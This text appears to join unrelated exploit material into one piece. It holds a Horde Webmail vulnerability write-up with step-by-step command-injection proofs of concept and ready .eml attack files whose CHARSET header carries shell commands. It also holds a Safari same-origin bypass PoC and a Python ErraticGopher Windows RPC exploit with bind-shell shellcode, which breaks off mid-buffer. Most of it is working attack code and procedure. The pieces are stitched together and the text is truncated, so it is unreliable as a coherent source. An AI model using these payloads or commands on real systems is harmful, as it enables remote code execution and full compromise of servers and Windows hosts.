/* 569 */ case "\n":
/* 570 */ /* Folding whitespace, remove the (CR)LF. */
/* 571 */ if (substr($str, -1) == "\r") {
/* 572 */ $str = substr($str, 0, -1);
/* 573 */ }
/* 574 */ continue;
/* 576 */ case '\\':
/* 577 */ if (($chr = $this->_curr(true)) === false) {
/* 578 */ break 2;
/* 579 */ }
/* 580 */ break;
/* 581 */ }
/* 583 */ $str .= $chr;
/* 584 */ }
/* 586 */ /* Missing trailing '"', or partial quoted character. */
/* 587 */ throw new Horde_Mail_Exception('Error when parsing a quoted string.');
/* 588 */ }
There are only a few limitations:
we cannot use “
\n will be deleted
we cannot use \ at the end of our mailbox
After creation of recipient list buildAndSendMessage() will call
_createMimeMessage():
Path: /imp/lib/Compose.php
/* 1446 */ protected function _createMimeMessage(
/* 1447 */ Horde_Mail_Rfc822_List $to, $body, array $options = array()
/* 1448 */ )
/* 1449 */ {
/* 1450 */ global $conf, $injector, $prefs, $registry;
/* ... */
/* 1691 */ /* Set up the base message now. */
/* 1692 */ $encrypt = empty($options['encrypt'])
/* 1693 */ ? IMP::ENCRYPT_NONE
/* 1694 */ : $options['encrypt'];
/* 1695 */ if ($prefs->getValue('use_pgp') &&
/* 1696 */ !empty($conf['gnupg']['path']) &&
/* 1697 */ in_array($encrypt, array(IMP_Crypt_Pgp::ENCRYPT,
IMP_Crypt_Pgp::SIGN, IMP_Crypt_Pgp::SIGNENC,
IMP_Crypt_Pgp::SYM_ENCRYPT, IMP_Crypt_Pgp::SYM_SIGNENC))) {
/* 1698 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp');
/* ... */
/* 1727 */ /* Do the encryption/signing requested. */
/* 1728 */ try {
/* 1729 */ switch ($encrypt) {
/* ... */
/* 1735 */ case IMP_Crypt_Pgp::ENCRYPT:
/* 1736 */ case IMP_Crypt_Pgp::SYM_ENCRYPT:
/* 1737 */ $to_list = clone $to;
/* 1738 */ if (count($options['from'])) {
/* 1739 */ $to_list->add($options['from']);
/* 1740 */ }
/* 1741 */ $base = $imp_pgp->IMPencryptMIMEPart($base, $to_list,
($encrypt == IMP_Crypt_Pgp::SYM_ENCRYPT) ?
$symmetric_passphrase : null);
/* 1742 */ break;
Here we can see validation (1695-1696 lines) that:
Current user has enabled “use_pgp” feature in his preferences (it is
not a problem as an attacker can edit his own preferences)
$conf[‘gnupg’][‘path’] is not empty. This value can be edited only by
admin. So if we don’t have value here our server is not vulnerable.
But if admin wants to allow users to use GPG feature he/she needs to
define value for this config.
Also we can see that in lines 1737-1739 to our recipient list will be
added address “from” as well.
Path: /imp/lib/Crypt/Pgp.php
/* 584 */ public function impEncryptMimePart($mime_part,
/* 585 */ Horde_Mail_Rfc822_List $addresses,
/* 586 */ $symmetric = null)
/* 587 */ {
/* 588 */ return $this->encryptMimePart($mime_part,
$this->_encryptParameters($addresses, $symmetric));
/* 589 */ }
Before encryptMimePart() call Horde uses _encryptParameters()
Path: /imp/lib/Crypt/Pgp.php
/* 536 */ protected function _encryptParameters(Horde_Mail_Rfc822_List
$addresses,
/* 537 */ $symmetric)
/* 538 */ {
/* ... */
/* 546 */ $addr_list = array();
/* 548 */ foreach ($addresses as $val) {
/* 549 */ /* Get the public key for the address. */
/* 550 */ $bare_addr = $val->bare_address;
/* 551 */ $addr_list[$bare_addr] = $this->getPublicKey($bare_addr);
/* 552 */ }
/* 554 */ return array('recips' => $addr_list);
/* 555 */ }
Horde will add to each address its Public Key. There a few source of
Public Keys:
AddressBook (we will use this source)
Servers with Public Keys
Note that Horde should be able to find Public Key for our “From”
address as well.
We can generate pair of PGP keys (https is required) or we can use the
same trick with AddressBook (we can create some contact, add any valid
Public PGP key, and add this address to default identity)
encryptMimePart() will call encrypt() method
Path: /Horde/Crypt/Pgp.php
/* 773 */ public function encryptMIMEPart($mime_part, $params = array())
/* 774 */ {
/* 775 */ $params = array_merge($params, array('type' => 'message'));
/* … */
/* 781 */ $message_encrypt = $this->encrypt($signenc_body, $params);
It will call encryptMessage()
Path: /Horde/Crypt/Pgp.php
/* 554 */ public function encrypt($text, $params = array())
/* 555 */ {
/* 556 */ switch (isset($params['type']) ? $params['type'] : false) {
/* 557 */ case 'message':
/* 558 */ $error = Horde_Crypt_Translation::t(
/* 559 */ "Could not PGP encrypt message."
/* 560 */ );
/* 561 */ $func = 'encryptMessage';
/* 562 */ break;
/* ... */
/* 586 */ $this->_initDrivers();
/* 587 */
/* 588 */ foreach ($this->_backends as $val) {
/* 589 */ try {
/* 590 */ return $val->$func($text, $params);
/* 591 */ } catch (Horde_Crypt_Exception $e) {}
/* 592 */ }
In conclusions:
If Horde server has enabled “GnuPG feature” any unprivileged user is
able to execute arbitrary code.
Enable GPG feature for attacker account (“Enable PGP functionality?”
checkbox on “PGP Configure PGP encryption support.” section in
Prefferences->Mail page )
Create some contact in the attacker AddressBook, add any valid Public
PGP key, and add this address to default identity
Create another contact in the attacker AddressBook, add any valid
Public PGP key, and change email address to some$(desired command to
execute) contact@somedomain.com
Create a new message to some$(desired command to execute) contact@somedomain.com
Choose Encryption:PGP Encrypt Message option
Click Send button
And desired command will be executed on the Horde server.
Proof of Concept – Authenticated Code Execution
For Proof of Concept we can use preconfigured image of Horde server
from Bitnami (Bitnami – “Easy to use cloud images, containers, and VMs
that work on any platform”):
https://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova
Step 1 – Login as admin (by default user:bitnami) and go to
Administration -> Configuration and choose Horde (horde). Open GnuPG
tab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click
“Generate Horde Configuration“:
Now we have enabled GPG feature on our server and we can login as
regular user and try to execute desired commands. But Bitnami image
does not have installed and configured Mail server so we need to use
external one or install it on local machine.
We will use gmail account (to be able to login to it from Horde I had
to change Gmail account setting Allow less secure apps: ON).
To use external Mail server we need to change the next setting:
“Administrator Panel” -> “Configuration” -> “Horde” ->
“Authentication”
Step 2 – Configure Horde web-mail authentication ($conf[auth][driver])
to “Let a Horde application handle authentication” and click “Generate
Horde Configuration”:
Step 3 – logout and login with your gmail account. Currently we are
login as regular user so we can try to execute desired commands:
Go to Preferences -> Mail and click on PGP link. Check Enable PGP
functionality? checkbox and click “Save”:
Create “from” contact in our AddressBook: “Address Book -> New Contact
-> in Address Book of …”
Personal tab – Last Name: mymailboxwithPGPkey
Communication tab – Email: mymailboxwihPGP@any.com
Other tab – PGP Public Key: any valid Public PGP key.
For example:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.6
Comment: Hostname: keyserver.ubuntu.com
mQGiBDk89iARBADhB7AyHQ/ZBlZjRRp1/911XaXGGmq1LDLTUTCAbJyQ1TzKDdetfT9Szk01
YPdAnovgzxTS89svuVHP/BiqLqhJMl2FfMLcJX+va+DujGuLDCZDHi+4czc33N3z8ArpxzPQ
5bfALrpNMJi6v2gZkDQAjMoeKrNEfXLCXQbTYWCuhwCgnZZCThya4xhmlLCTkwsQdMjFoj8D
/iOIP/6W27opMJgZqTHcisFPF6Kqyxe6GAftJo6ZtLEG26k2Qn3O0pghDz2Ql4aDVki3ms82
z77raSqbZVJzAFPzYoIKuc3JOoxxE+SelzSzj4LuQRXYKqZzT8/qYBCLg9cmhdm8PnwE9fd/
POGnNQFMk0i2xSz0FMr9R1emIKNsA/454RHIZ39ebvZzVULS1pSo6cI7DAJFQ3ejJqEEdAbr
72CW3eFUAdF+4bJQU/V69Nr+CmziBbyqKP6HfiUH9u8NLrYuK6XWXLVVSCBPsOxHxhw48hch
zVxJZ5Cyo/tMSOY/CxvLL/vMoT2+kQX1SCsWALosKJyOGbpCJmPasOLKdrQnQWxpY2UgKFJl
Y2h0c2Fud8OkbHRpbikgPGFsaWNlQGN5Yi5vcmc+iEYEEBECAAYFAjk+IEgACgkQzDSD4hsI
fQSaWQCgiDvvnRxa8XFOKy/NI7CKL5X4D28An2k9Cbh+dosXvB5zGCuQiAkLiQ+CiEYEEREC
AAYFAkKTPFcACgkQCY+3LE2/Ce4l+gCdFSHqp5HQCMKSOkLodepoG0FiQuwAnR2nioCQ3A5k
YI0NfUth+0QzJs1ciFYEExECABYFAjk89iAECwoEAwMVAwIDFgIBAheAAAoJEFsqCm37V5ep
fpAAoJezEplLlaGQHM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPoheBBMRAgAW
BQI5PPYgBAsKBAMDFQMCAxYCAQIXgAASCRBbKgpt+1eXqQdlR1BHAAEBfpAAoJezEplLlaGQ
HM8ppKReVHSyGuX+AKCYwRcwJJwoQHM8p86xhSuC/opYPrkBDQQ5PPYqEAQArSW27DriJAFs
Or+fnb3VwsYvznFfEv8NJyM/9/lDYfIROHIhdKCWswUWCgoz813RO2taJi5p8faM048Vczu/
VefTzVrsvpgXUIPQoXjgnbo6UCNuLqGk6TnwdJPPNLuIZLBEhGdA+URtFOA5tSj67h0G4fo0
P8xmsUXNgWVxX/MAAwUD/jUPLFgQ4ThcuUpxCkjMz+Pix0o37tOrFOU/H0cn9SHzCQKxn+iC
sqZlCsR+qXNDl43vSa6Riv/aHtrD+MJLgdIVkufuBWOogtuojusnFGY73xvvM1MfbG+QaUqw
gfe4UYOchLBNVtfN3WiqSPq5Yhue4m1u/xIvGGJQXvSBxNQyiEYEGBECAAYFAjk89ioACgkQ
WyoKbftXl6kV5QCfV7GjnmicwJPgxUQbDMP9u5KuVcsAn3aSmYyI1u6RRlKoThh0WEHayISv
iE4EGBECAAYFAjk89ioAEgkQWyoKbftXl6kHZUdQRwABARXlAJ9XsaOeaJzAk+DFRBsMw/27
kq5VywCfdpKZjIjW7pFGUqhOGHRYQdrIhK8=
=RHjX
-----END PGP PUBLIC KEY BLOCK-----
Click “Add” button:
Go to Preferences -> Global Preferences and click on Personal
Information link. Put mymailboxwihPGP@any.com into field The default
e-mail address to use with this identity and Click “Save”:
Create our “to” contact in our AddressBook: “Address Book -> New
Contact -> in Address Book of …”
Personal tab – Last Name: contact_for_attack
Communication tab – Email: hereinj@any.com
Other tab – PGP Public Key: any valid Public PGP key (it can be the
same as in the previous step)
And click “Add” button:
Inject our command: Click on Edit. Go to Communication Tab, put cursor
in Email field and chose “Inspect Element (Q)” from context menu:
Delete “email” from the type argument and close Inspector:
1
<input name="object[email]" id="object_email_" value="hereinj@any.com"
type="email">
Edit the address as we want – for example hereinj$(touch
/tmp/hereisvuln)@any.com and click “Save”:
Create a new message ( Mail -> New Message) with our contact as recipient:
Choose PGP Encrypt Message in Encryption option:
Enter any subject and any content. Click “Send”
We will get “PGP Error:…”
It is ok – let’s check our server:
We have a new file “hereisvuln” so our command was executed.
Unauthentication Remote Code Execution
Horde Webmail contains a vulnerability that allows a remote attacker
to execute arbitrary code with the privileges of the user who runs the
web server.
Vulnerable code: decryptSignature() function of GPG feature.
Path: /Horde/Crypt/Pgp/Backend/Binary.php:
/* 539 */ public function decryptSignature($text, $params)
/* 540 */ {
/* ... */
/* 550 */ /* Options for the GPG binary. */
/* 551 */ $cmdline = array(
/* 552 */ '--armor',
/* 553 */ '--always-trust',
/* 554 */ '--batch',
/* 555 */ '--charset ' . (isset($params['charset']) ?
$params['charset'] : 'UTF-8'),
/* 556 */ $keyring,
/* 557 */ '--verify'
/* 558 */ );
/* ... */
/* 571 */ $result = $this->_callGpg($cmdline, 'r', null, true, true, true);
/* ... */
$params[‘charset’] will be added to $cmdline array and passed to _callGpg():
/* 642 */ public function _callGpg(
/* 643 */ $options, $mode, $input = array(), $output = false, $stderr = false,
/* 644 */ $parseable = false, $verbose = false
/* 645 */ )
/* 646 */ {
/* … */
/* 675 */ $cmdline = implode(' ', array_merge($this->_gnupg, $options));
/* … */
/* 681 */ if ($mode == 'w') {
/* … */
/* 704 */ } elseif ($mode == 'r') {
/* 705 */ if ($fp = popen($cmdline, 'r')) {
/* … */
Our $params[‘charset’] will be in command line that is going to be executed.
decryptSignature() is called from decrypt() method:
Path – /Horde/Crypt/Pgp.php:
/* 611 */ public function decrypt($text, $params = array())
/* 612 */ {
/* 613 */ switch (isset($params['type']) ? $params['type'] : false) {
/* 614 */ case 'detached-signature':
/* 615 */ case 'signature':
/* 616 */ /* Check for required parameters. */
/* 617 */ if (!isset($params['pubkey'])) {
/* 618 */ throw new InvalidArgumentException(
/* 619 */ 'A public PGP key is required to verify a signed message.'
/* 620 */ );
/* 621 */ }
/* 622 */ if (($params['type'] === 'detached-signature') &&
/* 623 */ !isset($params['signature'])) {
/* 624 */ throw new InvalidArgumentException(
/* 625 */ 'The detached PGP signature block is required to verify the
signed message.'
/* 626 */ );
/* 627 */ }
/* 628 */
/* 629 */ $func = 'decryptSignature';
/* 630 */ break;
/* ... */
/* 650 */ $this->_initDrivers();
/* 651 */
/* 652 */ foreach ($this->_backends as $val) {
/* 653 */ try {
/* 654 */ return $val->$func($text, $params);
/* 655 */ } catch (Horde_Crypt_Exception $e) {}
/* 656 */ }
/* ... */
decrypt() with needed parameters is used in verifySignature():
Path – /imp/lib/Crypt/Pgp.php
/* 339 */ public function verifySignature($text, $address, $signature = '',
/* 340 */ $charset = null)
/* 341 */ {
/* 342 */ if (!empty($signature)) {
/* 343 */ $packet_info = $this->pgpPacketInformation($signature);
/* 344 */ if (isset($packet_info['keyid'])) {
/* 345 */ $keyid = $packet_info['keyid'];
/* 346 */ }
/* 347 */ }
/* 349 */ if (!isset($keyid)) {
/* 350 */ $keyid = $this->getSignersKeyID($text);
/* 351 */ }
/* 353 */ /* Get key ID of key. */
/* 354 */ $public_key = $this->getPublicKey($address, array('keyid' => $keyid));
/* 356 */ if (empty($signature)) {
/* 357 */ $options = array('type' => 'signature');
/* 358 */ } else {
/* 359 */ $options = array('type' => 'detached-signature', 'signature'
=> $signature);
/* 360 */ }
/* 361 */ $options['pubkey'] = $public_key;
/* 363 */ if (!empty($charset)) {
/* 364 */ $options['charset'] = $charset;
/* 365 */ }
/* 369 */ return $this->decrypt($text, $options);
/* 370 */ }
verifySignature() is called from _outputPGPSigned():
Path – /imp/lib/Mime/Viewer/Pgp.php
/* 387 */ protected function _outputPGPSigned()
/* 388 */ {
/* 389 */ global $conf, $injector, $prefs, $registry, $session;
/* 390 */
/* 391 */ $partlist = array_keys($this->_mimepart->contentTypeMap());
/* 392 */ $base_id = reset($partlist);
/* 393 */ $signed_id = next($partlist);
/* 394 */ $sig_id = Horde_Mime::mimeIdArithmetic($signed_id, 'next');
/* 395 */
/* 396 */ if (!$prefs->getValue('use_pgp') || empty($conf['gnupg']['path'])) {
/* 397 */ return array(
/* 398 */ $sig_id => null
/* 399 */ );
/* 400 */ }
/* ... */
/* 417 */ if ($prefs->getValue('pgp_verify') ||
/* 418 */ $injector->getInstance('Horde_Variables')->pgp_verify_msg) {
/* 419 */ $imp_contents = $this->getConfigParam('imp_contents');
/* 420 */ $sig_part = $imp_contents->getMIMEPart($sig_id);
/* ... */
/* 433 */ try {
/* 434 */ $imp_pgp = $injector->getInstance('IMP_Crypt_Pgp');
/* 435 */ if ($sig_raw =
$sig_part->getMetadata(Horde_Crypt_Pgp_Parse::SIG_RAW)) {
/* 436 */ $sig_result = $imp_pgp->verifySignature($sig_raw,
$this->_getSender()->bare_address, null, $sig_part-
> getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET));
/* ... */
And it is used in _renderInline():
Path – /imp/lib/Mime/Viewer/Pgp.php
/* 134 */ protected function _renderInline()
/* 135 */ {
/* 136 */ $id = $this->_mimepart->getMimeId();
/* 138 */ switch ($this->_mimepart->getType()) {
/* ... */
/* 142 */ case 'multipart/signed':
/* 143 */ return $this->_outputPGPSigned();
Let’s go back to _outputPGPSigned() method. We can see a few
requirements before the needed call:
$conf[‘gnupg’][‘path’] should be not empty. This value can be edited
only by admin(if he/she wants to allow users to use GPG feature he/she
needs to define value for this config).
Current user has enabled “use_pgp” feature in his preferences
Current user has enabled “pgp_verify” feature in his preferences
Current user has enabled “pgp_verify” feature in his preferences
Also we see that our charset value is taken from $sig_part ->
getMetadata(Horde_Crypt_Pgp_Parse::SIG_CHARSET)
Our value will be stored during parsing of PGP parts:
Path – /Horde/Crypt/Pgp/Parse.php
/* 150 */ public function parseToPart($text, $charset = 'UTF-8')
/* 151 */ {
/* 152 */ $parts = $this->parse($text);
/* ... */
/* 162 */ while (list(,$val) = each($parts)) {
/* 163 */ switch ($val['type']) {
/* ... */
/* 200 */ case self::ARMOR_SIGNED_MESSAGE:
/* 201 */ if ((list(,$sig) = each($parts)) &&
/* 202 */ ($sig['type'] == self::ARMOR_SIGNATURE)) {
/* 203 */ $part = new Horde_Mime_Part();
/* 204 */ $part->setType('multipart/signed');
/* 205 */ // TODO: add micalg parameter
/* 206 */ $part->setContentTypeParameter('protocol',
'application/pgp-signature');
/* 207 */
/* 208 */ $part1 = new Horde_Mime_Part();
/* 209 */ $part1->setType('text/plain');
/* 210 */ $part1->setCharset($charset);
/* 211 */
/* 212 */ $part1_data = implode("\n", $val['data']);
/* 213 */ $part1->setContents(substr($part1_data, strpos($part1_data,
"\n\n") + 2));
/* 214 */
/* 215 */ $part2 = new Horde_Mime_Part();
/* 216 */
/* 217 */ $part2->setType('application/pgp-signature');
/* 218 */ $part2->setContents(implode("\n", $sig['data']));
/* 219 */
/* 220 */ $part2->setMetadata(self::SIG_CHARSET, $charset);
/* 221 */ $part2->setMetadata(self::SIG_RAW, implode("\n",
$val['data']) . "\n" . implode("\n", $sig['data']));
/* 222 */
/* 223 */ $part->addPart($part1);
/* 224 */ $part->addPart($part2);
/* 225 */ $new_part->addPart($part);
/* 226 */
/* 227 */ next($parts);
/* 228 */ }
/* 229 */ }
/* 230 */ }
/* 231 */
/* 232 */ return $new_part;
/* 233 */ }
It is called from _parsePGP():
Path – /imp/lib/Mime/Viewer/Plain.php
×
1
2
3
4
5
6
7
8
/* 239 */ protected function _parsePGP()
/* 240 */ {
/* 241 */ $part =
$GLOBALS['injector']->getInstance('Horde_Crypt_Pgp_Parse')->parseToPart(
/* 242 */ new Horde_Stream_Existing(array(
/* 243 */ 'stream' => $this->_mimepart->getContents(array('stream' => true))
/* 244 */ )),
/* 245 */ $this->_mimepart->getCharset()
/* 246 */ );
Our charset value is taken from CHARSET attribute of Content-Type
header of parent MIMEpart.
_parsePGP() is used in _getEmbeddedMimeParts() method and from Horde
Webmail ver 5.2.0 it looks like:
Path – /imp/lib/Mime/Viewer/Plain.php
/* 222 */ protected function _getEmbeddedMimeParts()
/* 223 */ {
/* 224 */ $ret = $this->getConfigParam('pgp_inline')
/* 225 */ ? $this->_parsePGP()
/* 226 */ : null;
We can see an additional requirement – our function will be called
only if ‘pgp_inline‘ config parameter is “true”. It is defined in:
Path – /imp/config/mime_drivers.php
/* 37 */ /* Scans the text for inline PGP data. If true, will strip this data
/* 38 */ * out of the output (and, if PGP is active, will display the
/* 39 */ * results of the PGP action). */
/* 40 */ 'pgp_inline' => false
Default value is false, so the major part of Horde servers is not
vulnerable and our attack is relevant only if an admin manually has
changed this line to ‘pgp_inline‘ => true.
But in older versions (before 5.2.0) the code of
_getEmbeddedMimeParts() is a bit different:
Path – /imp/lib/Mime/Viewer/Plain.php
/* 227 */ protected function _getEmbeddedMimeParts()
/* 228 */ {
/* 229 */ $ret = null;
/* 230 */
/* 231 */ if (!empty($GLOBALS['conf']['gnupg']['path']) &&
/* 232 */ $GLOBALS['prefs']->getValue('pgp_scan_body')) {
/* 233 */ $ret = $this->_parsePGP();
/* 234 */ }
So instead of requirement to have config parameter we have requirement
of ‘pgp_scan_body‘ Preference of current user. And it is more likely
to find a victim with needed preferences. We saw where our injected
command is executed and from where and when it is taken
During rendering of massage we:
Will parse PGP values:
#0 IMP_Mime_Viewer_Plain->_parsePGP() called at
[/imp/lib/Mime/Viewer/Plain.php:225]
#1 IMP_Mime_Viewer_Plain->_getEmbeddedMimeParts() called at
[/Horde/Mime/Viewer/Base.php:298]
#2 Horde_Mime_Viewer_Base->getEmbeddedMimeParts() called at
[/imp/lib/Contents.php:1114]
#3 IMP_Contents->_buildMessage() called at [/imp/lib/Contents.php:1186]
#4 IMP_Contents->getContentTypeMap() called at [/imp/lib/Contents.php:1423]
#5 IMP_Contents->getInlineOutput() called at
[/imp/lib/Ajax/Application/ShowMessage.php:296]
Will use them in:
#0 IMP_Mime_Viewer_Plain->_parsePGP() called at
[/imp/lib/Mime/Viewer/Plain.php:225]
#0 IMP_Mime_Viewer_Pgp->_renderInline() called at
[/Horde/Mime/Viewer/Base.php:156]
#1 Horde_Mime_Viewer_Base->render() called at [/Horde/Mime/Viewer/Base.php:207]
#2 Horde_Mime_Viewer_Base->_renderInline() called at
[/Horde/Mime/Viewer/Base.php:156]
#3 Horde_Mime_Viewer_Base->render() called at [/imp/lib/Contents.php:654]
#4 IMP_Contents->renderMIMEPart() called at [/imp/lib/Contents.php:1462]
#5 IMP_Contents->getInlineOutput() called at
[/imp/lib/Ajax/Application/ShowMessage.php:296]]
In conclusions:
If Horde server has vulnerable configuration:
Enabled “GnuPG feature” (there is path to gpg binary in
$conf[gnupg][path] setting)
Only for ver 5.2.0 and newer: ‘pgp_inline’ => true, in
/imp/config/mime_drivers.php
And the victim has checked the next checkbox in his/her preferences (
“PGP Configure PGP encryption support.” in Prefferences->Mail) :
“Enable PGP functionality”
“Should PGP signed messages be automatically verified when viewed?” if
it is not checked our command will be executed when the victim clicks
on the link “Click HERE to verify the message.”
For versions before 5.2.0: “Should the body of plaintext message be
scanned for PGP data”
An attacker can create email with PGP data, put desired command into
CHARSET attribute of ContentType header, and this command will be
executed on Horde server when the victim opens this email.
Proof of Concept – Remote Code Execution
For Proof of Concept we can use preconfigured image of Horde server
from Bitnami (Bitnami – “Easy to use cloud images, containers, and VMs
that work on any platform”):
https://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova
Step 1 – Login as admin (by default user:bitnami) and go to
Administration -> Configuration and choose Horde (horde). Open GnuPG
tab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click
“Generate Horde Configuration“:
Now we have enabled GPG feature on our server and we can login as
regular user and try to execute desired commands. But Bitnami image
does not have installed and configured Mail server so we need to use
external one or install it on local machine.
We will use gmail account (to be able to login to it from Horde I had
to change Gmail account setting Allow less secure apps: ON).
To use external Mail server we need to change the next setting:
“Administrator Panel” -> “Configuration” -> “Horde” ->
“Authentication”
Configure the application authentication ($conf[auth][driver]) –
change this option to “Let a Horde application handle authentication”
and click “Generate Horde Configuration”.
If we have Horde Webmail ver 5.2.0 or newer we need to edit
/imp/config/mime_drivers.php file. Login to the console of bitnami
image (default bitnami:bitnami) and run the next command:
sudo nano /opt/bitnami/apps/horde/htdocs/imp/config/mime_drivers.php
Change the line: “‘pgp_inline’ => false” to “‘pgp_inline’ => true” and
save the changes.
Step 2 – Logout and login with your gmail account.
Step 3 – Go to Preferences -> Mail and click on PGP link:
Check Enable PGP functionality checkbox and click “Save”
Check Should PGP signed messages be automatically verified when viewed checkbox
For versions before 5.2.0 check “Should the body of plain-text message
be scanned for PGP data” checkbox Click “Save”
For version before 5.2.0:
Step 4 – Go to the Mail, take any mail folder (for example Drafts),
and chose “Import” item from context menu and import attack_whoami.eml
file (in the end of this blog).
Click on the imported email:
Our Horde serve is launched under daemon user
Step 5 – We can do the same with attack_touch.eml (in the end of this
blog) file (import it and click on the new mail) and check /tmp
folder:
attack_touch.eml
Date: Fri, 04 Nov 2016 16:04:19 +0000
Message-ID: <20161104160419.Horde.HpYObg_3-4QS-nUzWujEkg3@ubvm.mydomain.com>
From: Donald Trump <attacker@attacker.com>
To: SomeUser@mydoamin.com
Subject: PGP_INLine_touch_tmp_youarevuln
X-IMP-Draft: Yes
Content-Type: text/plain; CHARSET="US-ASCII`touch /tmp/youarevuln`";
format=flowed; DelSp=Yes
MIME-Version: 1.0
Content-Disposition: inline
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
This is a sample of a clear signed message.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMoSCcM4T3nOFCCzVAQF4aAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF
U5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh
DztuhjzJMEzwtm8KTKBnF/LJ9X05pSQUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz
CvynscaD+wA=
=Xb9n
-----END PGP SIGNATURE-----
attack_whoami.eml
Date: Fri, 04 Nov 2016 16:04:19 +0000
Message-ID: <20161104160419.Horde.HpYObg_3-4QS-nUzWujEkg3@ubvm.mydomain.com>
From: Donald Trump <attacker@attacker.com>
To: SomeUser@mydoamin.com
Subject: PGP_INLine_whoami
X-IMP-Draft: Yes
Content-Type: text/plain; CHARSET=US-ASCII`whoami`; format=flowed; DelSp=Yes
MIME-Version: 1.0
Content-Disposition: inline
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
This is a sample of a clear signed message.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMoSCcM4T3nOFCCzVAQFJaAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF
U5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh
DztuhjzJMEzwtm8KTKBnF/LJ9X05pSsUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz
CvynscaD+wA=
=Xb9n
-----END PGP SIGNATURE-----
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1121
Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.
bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)
{
// Support for <frame src="javascript:string">
URL scriptURL;
URL url;
if (protocolIsJavaScript(urlString)) {
scriptURL = completeURL(urlString); // completeURL() encodes the URL.
url = blankURL();
} else
url = completeURL(urlString);
if (shouldConvertInvalidURLsToBlank() && !url.isValid())
url = blankURL();
Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.
if (!frame)
return false;
if (!scriptURL.isEmpty())
frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom
return true;
}
A SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| called. This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.
Tested on Safari 10.0.3(12602.4.8).
PoC:
-->
<body>
<p>click anywhere</p>
<script>
window.onclick = () => {
window.onclick = null;
f = document.createElement('iframe');
f.src = 'javascript:alert(location)';
f.onload = () => {
f.onload = null;
let a = f.contentDocument.createElement('a');
a.href = 'https://abc.xyz/';
a.click();
window.showModalDialog(URL.createObjectURL(new Blob([`
<script>
let it = setInterval(() => {
try {
opener[0].document.x;
} catch (e) {
clearInterval(it);
window.close();
}
}, 100);
</scrip` + 't>'], {type: 'text/html'})));
};
document.body.appendChild(f);
};
cached.src = kUrl;
</script>
</body>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##################################################################################
# By Victor Portal (vportal) for educational porpouse only
##################################################################################
# This exploit is the python version of the ErraticGopher exploit probably #
# with some modifications. ErraticGopher exploits a memory corruption #
# (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet. #
# Because the Magic bytes, the application redirects the execution to the #
# iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy #
# all te injected stub from the heap to the stack, overwritten a return #
# address as well as the SEH handler stored in the Stack, being possible #
# to control the execution flow to disable DEP and jump to the shellcode #
# as SYSTEM user. #
##################################################################################
#The exploit only works if target has the RRAS service enabled
#Tested on Windows Server 2003 SP2
import struct
import sys
import time
import os
from threading import Thread
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
target = sys.argv[1]
print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)
#RRAS DCE-RPC CALL
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
